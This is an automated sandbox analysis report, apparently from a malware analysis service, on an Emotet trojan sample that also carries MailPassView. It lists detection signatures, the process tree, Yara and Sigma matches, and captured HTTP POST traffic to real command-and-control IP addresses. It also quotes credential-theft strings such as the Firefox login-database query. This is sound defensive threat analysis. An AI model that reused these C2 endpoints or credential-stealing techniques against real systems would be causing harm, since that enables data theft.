
Analysis Report SecuriteInfo.com.Trojan.DownLoader34.9370.3972.9467

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.DownLoader34.9370.3972.9467 (renamed file extension from 9467 to exe)
Analysis ID: 255750
MD5: 4b15ebd8435204917268dc9fb49e6f1c
SHA1: caa209068607aed25f4b75b4fa694967c8ed8b87
SHA256: dd81162cc1f6e31565ec939e25c5cacf5d9f26fd2fef40e56f4f0dfef07499ca

Most interesting Screenshot:

Detection

Emotet MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe (PID: 7112 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe' MD5: 4B15EBD8435204917268DC9FB49E6F1C)
    • msfeedsbs.exe (PID: 6168 cmdline: C:\Windows\SysWOW64\msi\msfeedsbs.exe MD5: 4B15EBD8435204917268DC9FB49E6F1C)
      • msfeedsbs.exe (PID: 6364 cmdline: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp' MD5: 4B15EBD8435204917268DC9FB49E6F1C)
      • msfeedsbs.exe (PID: 6460 cmdline: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp' MD5: 4B15EBD8435204917268DC9FB49E6F1C)
      • msfeedsbs.exe (PID: 6412 cmdline: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D402.tmp' MD5: 4B15EBD8435204917268DC9FB49E6F1C)
      • msfeedsbsoe.exe (PID: 6924 cmdline: 'C:\Windows\SysWOW64\msi\msfeedsbsoe.exe' 'C:\Users\user\AppData\Local\Temp\CB36.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 4496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5492 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6596 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6912 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 6800 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6588 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2312 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5544 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5884 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1356 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6496 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000000.00000002.231168035.0000000002251000.00000020.00000001.sdmp
  Rule: JoeSecurity_Emotet
  Description: Yara detected Emotet
  Author: Joe Security

Source: 00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmp
  Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1
  Description: Detects BabyShark KimJongRAT
  Author: Florian Roth
  Strings:
    • 0x147b0:$a1: logins.json
    • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
    • 0x14f34:$s4: \mozsqlite3.dll
    • 0x137a4:$s5: SMTP Password

Source: 00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_MailPassView
  Description: Yara detected MailPassView
  Author: Joe Security

Source: 00000001.00000003.270006445.0000000003A99000.00000004.00000001.sdmp
  Rule: JoeSecurity_Emotet
  Description: Yara detected Emotet
  Author: Joe Security

Source: 00000007.00000002.277303523.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_WebBrowserPassView
  Description: Yara detected WebBrowserPassView password recovery tool
  Author: Joe Security

(21 entries in total; the remaining entries are not included in this extract)

Unpacked PEs

Source: 1.2.msfeedsbs.exe.3e20000.9.unpack
  Rule: JoeSecurity_Emotet
  Description: Yara detected Emotet
  Author: Joe Security

Source: 9.2.msfeedsbs.exe.400000.0.unpack
  Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1
  Description: Detects BabyShark KimJongRAT
  Author: Florian Roth
  Strings:
    • 0x131b0:$a1: logins.json
    • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
    • 0x13934:$s4: \mozsqlite3.dll
    • 0x121a4:$s5: SMTP Password

Source: 9.2.msfeedsbs.exe.400000.0.unpack
  Rule: JoeSecurity_MailPassView
  Description: Yara detected MailPassView
  Author: Joe Security

Source: 1.3.msfeedsbs.exe.3ff0000.1.raw.unpack
  Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1
  Description: Detects BabyShark KimJongRAT
  Author: Florian Roth
  Strings:
    • 0x147b0:$a1: logins.json
    • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
    • 0x14f34:$s4: \mozsqlite3.dll
    • 0x137a4:$s5: SMTP Password

Source: 1.3.msfeedsbs.exe.3ff0000.1.raw.unpack
  Rule: JoeSecurity_MailPassView
  Description: Yara detected MailPassView
  Author: Joe Security

(19 entries in total; the remaining entries are not included in this extract)

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Creation
  Source: Process started
  Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update)
  Data:
    Command: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'
    CommandLine: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'
    CommandLine|base64offset|contains: (f
    Image: C:\Windows\SysWOW64\msi\msfeedsbs.exe
    NewProcessName: C:\Windows\SysWOW64\msi\msfeedsbs.exe
    OriginalFileName: C:\Windows\SysWOW64\msi\msfeedsbs.exe
    ParentCommandLine: C:\Windows\SysWOW64\msi\msfeedsbs.exe
    ParentImage: C:\Windows\SysWOW64\msi\msfeedsbs.exe
    ParentProcessId: 6168
    ProcessCommandLine: 'C:\Windows\SysWOW64\msi\msfeedsbs.exe' /scomma 'C:\Users\user\AppData\Local\Temp\D0A6.tmp'
    ProcessId: 6460

Signature Overview

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, Code function: 0_2_0044438D __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_0044438D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, Code function: 0_2_004448A3 FindFirstFileA,FindClose,0_2_004448A3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.3972.exe, Code function: 0_2_0225286B FindFirstFileW,FindNextFileW,FindClose,0_2_0225286B
Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe, Code function: 1_2_0044438D __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,1_2_0044438D
Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe, Code function: 1_2_004448A3 FindFirstFileA,FindClose,1_2_004448A3
Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe, Code function: 7_2_0040A1A7 FindFirstFileW,FindNextFileW,7_2_0040A1A7
Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe, Code function: 7_1_0040A1A7 FindFirstFileW,FindNextFileW,7_1_0040A1A7
Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe, Code function: 9_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,9_2_0040702D
Source: C:\Windows\SysWOW64\msi\msfeedsbs.exe, Code function: 9_1_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,9_1_0040702D

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2404310 ET CNC Feodo Tracker Reported CnC Server TCP group 6 192.168.2.4:49713 -> 179.60.229.168:443
Source: Traffic, Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.4:49719 -> 185.94.252.13:443

Source: global traffic, HTTP traffic detected:
  POST /1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/ HTTP/1.1
  Referer: http://185.94.252.13/1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/
  Content-Type: multipart/form-data; boundary=---------------------------478067155910569
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4580
  Connection: Keep-Alive
  Cache-Control: no-cache

Source: global traffic, HTTP traffic detected:
  POST /MpgTsM1J0/6qj3hhMoM75iKVOg/8pfEG30u/JSj9UiSQyHPjM/Te19Jv/MzuRY8URe2gRU/ HTTP/1.1
  Referer: http://185.94.252.13/MpgTsM1J0/6qj3hhMoM75iKVOg/8pfEG30u/JSj9UiSQyHPjM/Te19Jv/MzuRY8URe2gRU/
  Content-Type: multipart/form-data; boundary=---------------------------478007351471322
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4596
  Connection: Keep-Alive
  Cache-Control: no-cache

Source: global traffic, HTTP traffic detected:
  POST /nvl6N9BkGu8qGBj1kt/Scnz1D0wnF/XhO4nU7uDSvXi/ HTTP/1.1
  Referer: http://185.94.252.13/nvl6N9BkGu8qGBj1kt/Scnz1D0wnF/XhO4nU7uDSvXi/
  Content-Type: multipart/form-data; boundary=---------------------------843726928946680
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache

Source: global traffic, HTTP traffic detected:
  POST /4eFGIr2Q/ HTTP/1.1
  Referer: http://185.94.252.13/4eFGIr2Q/
  Content-Type: multipart/form-data; boundary=---------------------------833999072921064
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache

Source: global traffic, HTTP traffic detected:
  POST /0QTVRe/ HTTP/1.1
  Referer: http://185.94.252.13/0QTVRe/
  Content-Type: multipart/form-data; boundary=---------------------------493295889600463
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache

Source: global traffic, HTTP traffic detected:
  POST /WlvFVMzY9o0MCu7bGt/5LzttrT8yu1JU/0DI9yVpNQIVQjaC1Ymm/9Me6TS/PUv4tc/ HTTP/1.1
  Referer: http://185.94.252.13/WlvFVMzY9o0MCu7bGt/5LzttrT8yu1JU/0DI9yVpNQIVQjaC1Ymm/9Me6TS/PUv4tc/
  Content-Type: multipart/form-data; boundary=---------------------------324971134791349
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4612
  Connection: Keep-Alive
  Cache-Control: no-cache

Source: global traffic, HTTP traffic detected:
  POST /RZet/JcZR9R/4cj9gTCjsqKt3/ HTTP/1.1
  Referer: http://88.217.172.65/RZet/JcZR9R/4cj9gTCjsqKt3/
  Content-Type: multipart/form-data; boundary=---------------------------334418556186205
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 88.217.172.65:443
  Content-Length: 4356
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown, TCP traffic detected without corresponding DNS query: 179.60.229.168 (3 connections)
Source: unknown, TCP traffic detected without corresponding DNS query: 185.94.252.13 (47 connections)
Source: svchost.exe, 00000016.00000003.388264493.0000019D2DF58000.00000004.00000001.sdmp, String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN"," equals www.facebook.com (Facebook) and www.twitter.com (Twitter)
Source: msfeedsbs.exe, 00000001.00000003.279002576.00000000039FD000.00000004.00000001.sdmp, msfeedsbs.exe, 00000007.00000002.277303523.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook) and www.yahoo.com (Yahoo)
Source: msfeedsbs.exe, String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: msfeedsbs.exe, 00000007.00000003.277194814.0000000000B59000.00000004.00000001.sdmp, String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srffile:///C:/jbxinitvm.au3file://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook) and www.yahoo.com (Yahoo)

Source: unknown, HTTP traffic detected:
  POST /1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/ HTTP/1.1
  Referer: http://185.94.252.13/1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/
  Content-Type: multipart/form-data; boundary=---------------------------478067155910569
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: 185.94.252.13:443
  Content-Length: 4580
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: msfeedsbs.exe, 00000001.00000003.265151798.0000000002830000.00000004.00000001.sdmp, String found in binary or memory: http://179.60.229.168/ATro903NoCC/HeMJ3uWuizwWl/IwzysKn18/ogDoqDpLetGknDRgC0a/
Source: msfeedsbs.exe, 00000001.00000002.499031804.00000000027C4000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13/1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/
Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13:443/0QTVRe/
Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13:443/0QTVRe/M
Source: msfeedsbs.exe, 00000001.00000003.266758693.0000000002838000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13:443/1IAsFZvuGiSlwuhIa/jB5GvJyKSYp/
Source: msfeedsbs.exe, 00000001.00000003.320758170.000000000284D000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13:443/4eFGIr2Q/
Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13:443/4eFGIr2Q/V
Source: msfeedsbs.exe, 00000001.00000003.320758170.000000000284D000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13:443/4eFGIr2Q/WOW64
Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13:443/WlvFVMzY9o0MCu7bGt/5LzttrT8yu1JU/0DI9yVpNQIVQjaC1Ymm/9Me6TS/PUv4tc/
Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13:443/nvl6N9BkGu8qGBj1kt/Scnz1D0wnF/XhO4nU7uDSvXi/
Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmp, String found in binary or memory: http://185.94.252.13:443/nvl6N9BkGu8qGBj1kt/Scnz1D0wnF/XhO4nU7uDSvXi/5
Source: msfeedsbs.exe, 00000001.00000003.320472104.0000000002850000.00000004.00000001.sdmp, String found in binary or memory: http://88.217.172.65/RZet/JcZR9R/4cj9gTCjsqKt3/
Source: msfeedsbs.exe, 00000001.00000003.320472104.0000000002850000.00000004.00000001.sdmp, String found in binary or memory: http://88.217.172.65/RZet/JcZR9R/4cj9gTCjsqKt3/Z
Source: msfeedsbs.exe, 00000001.00000003.320472104.0000000002850000.00000004.00000001.sdmp, msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmp, String found in binary or memory: http://88.217.172.65:443/RZet/JcZR9R/4cj9gTCjsqKt3/
Source: msfeedsbs.exe, 00000001.00000002.499252084.0000000002838000.00000004.00000001.sdmp, String found in binary or memory: http://88.217.172.65:443/RZet/JcZR9R/4cj9gTCjsqKt3/)
Source: msfeedsbs.exe, 00000001.00000003.320472104.0000000002850000.00000004.00000001.sdmp, String found in binary or memory: http://88.217.172.65:443/RZet/JcZR9R/4cj9gTCjsqKt3/J
Source: svchost.exe, 00000004.00000002.500442562.000002116DE0E000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.404505748.0000019D2DF13000.00000004.00000001.sdmp, String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: svchost.exe, 00000004.00000002.500442562.000002116DE0E000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.404505748.0000019D2DF13000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000004.00000002.497186265.00000211688A1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.404505748.0000019D2DF13000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000004.00000002.501127718.000002116E170000.00000002.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 0000000C.00000002.306386180.0000017351413000.00000004.00000001.sdmp, String found in binary or memory: http://www.bingmapsportal.com
Source: msfeedsbs.exe, 00000007.00000002.277278118.000000000019C000.00000004.00000010.sdmp, String found in binary or memory: http://www.nirsoft.net
Source: msfeedsbs.exe, msfeedsbs.exe, 00000009.00000002.274549880.0000000000400000.00000040.00000001.sdmp, String found in binary or memory: http://www.nirsoft.net/
Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmp, String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmp, String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmp, String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmp, String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmp, String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmp, String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmp, String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000002.306452776.000001735144E000.00000004.00000001.sdmp, String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmp, String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmp, String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmp, String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmp, String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmp, String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmp, String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000C.00000003.305945195.0000017351441000.00000004.00000001.sdmp, String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 0000000C.00000003.305945195.0000017351441000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.305668094.000001735145A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000C.00000002.306452776.000001735144E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000C.00000003.305395799.0000017351461000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000C.00000003.281205822.0000017351432000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: msfeedsbs.exe, 00000007.00000003.277194814.0000000000B59000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
                Source: msfeedsbs.exeString found in binary or memory: https://login.yahoo.com/config/login
                Source: svchost.exe, 00000016.00000003.390656164.0000019D2DF9B000.00000004.00000001.sdmp, svchost.exe, 00000016.00000003.390583328.0000019D2DF69000.00000004.00000001.sdmpString found in binary or memory: https://support.hotspotshield.com/
                Source: svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000C.00000002.306386180.0000017351413000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.306428540.000001735143D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000C.00000003.281205822.0000017351432000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
